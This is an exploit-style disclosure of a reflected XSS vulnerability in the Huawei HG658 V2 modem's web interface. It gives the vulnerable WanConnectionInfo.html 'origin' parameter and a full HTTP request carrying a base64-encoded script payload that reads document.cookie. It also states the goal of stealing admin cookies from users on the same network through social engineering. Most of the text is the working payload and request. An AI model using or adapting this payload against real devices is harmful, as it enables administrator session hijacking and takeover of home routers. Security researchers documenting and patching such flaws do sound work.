HUAWEI HG658 V2 => Modem Web Interface Reflected XSS Vulnerability ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Discovered by: KnocKout [~] Contact : knockout@e-mail.com.tr [~] HomePage : http://cyber-warrior.org ############################################################ ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Hardware/Web App : HUAWEI |~Affected Version : HG658 V2 |~Official Web: http://www.huawei.com ####################INFO################################ the same network with a social engineering scenario is on the modem manager to do the admin cookies can be captured ######################################################## ---------------------------------------------------------- HTTP://192.168.1.1/html/pub/WanConnectionInfo.html?origin=[Base64 XSS Code] Proof image: http://i.hizliresim.com/EgqAkv.png ---------------------------------------------------------- Request ---------------------------------------------------------- GET http://192.168.1.1/html/pub/WanConnectionInfo.html?origin=Ij48c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4= Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: username=admin; SessionID_R3=CaRyWGufAmjwkbRbn0HTfRFZ0GqzVM6y38r0r0NvID0BPc5prfJNScondh34nopeC0dRFiPtEx4IpngNmkZ6te9tlWDKk8Hoolzo2FjW5nu3BeUn5uAb0k1FDgQG2zH Connection: keep-alive Upgrade-Insecure-Requests: 1 If-None-Match: R5